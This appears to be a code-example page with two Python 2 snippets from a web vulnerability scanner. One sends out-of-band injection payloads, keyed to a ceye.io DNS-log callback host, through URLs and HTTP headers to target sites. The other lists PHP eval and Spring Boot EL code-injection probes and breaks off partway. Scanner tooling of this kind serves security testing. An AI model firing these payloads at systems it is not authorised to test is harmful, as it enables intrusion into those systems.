예제 #1
0
    def run(self):

        DNSLOG_HOST = 'dseje4.ceye.io'

        # run
        for url in self.target_urls:

            # 随机标记
            sign = Random.id_generator(size=10)

            # DNSLOG 地址
            DNSLOG_HOST = '{}.{}'.format(sign, DNSLOG_HOST)

            # 生成payload
            payloads = [payload.format(DNSLOG_HOST)
                        for payload in payloads_tpl]

            # Double Quotes
            d_quotes = [
                '"{}"'.format(payload) for payload in payloads
            ]
            payloads.extend(d_quotes)

            # 生成头部payload
            headers = {}
            for k, v in headers_tpl.iteritems():
                if k == 'Referer':
                    headers[k] = v.format(url, DNSLOG_HOST)
                    continue
                headers[k] = v.format(DNSLOG_HOST)
            
            p = Pollution(payloads)

            urls = []

            for i in p.payload_generator(url):
                urls.append(i)
                print Url.urldecode(i)

            logging.info('{0} => {1}'.format(url, sign))

            print 'Payload Number:', len(urls)

            # Start
            rs = (grequests.get(u, headers=headers, allow_redirects=False)
                  for u in urls)

            grequests.map(rs, gtimeout=BILID_REQUEST_TIMEOUT)
#!/usr/bin/env python
# -*- encoding: utf-8 -*-

from utils import Random, Hash

phpinfo_sign = '<a href="http://www.php.net/">'
xss_payload = xss_sign = '\'";abcdefg123456'

el_sign = Random.id_generator(size=10)
el_payload = ','.join(str(ord(i)) for i in el_sign)

el_sign2 = '119841162-2'
el2_payload = el_sign2


# Command Execute Payloads
payloads = [
    {
        'name': 'PHP Code eval',
        'payload': 'phpinfo();',
        'sign': phpinfo_sign

    }, {
        'name': 'PHP Code eval',
        'payload': '${print_r(md5(11123))};',
        'sign': Hash.md5('11123')

    }, {
        'name': 'Sprint Boot EL',
        'payload': '${{new java.lang.String(new byte[]{{{0}}})}}'.format(
            el_payload),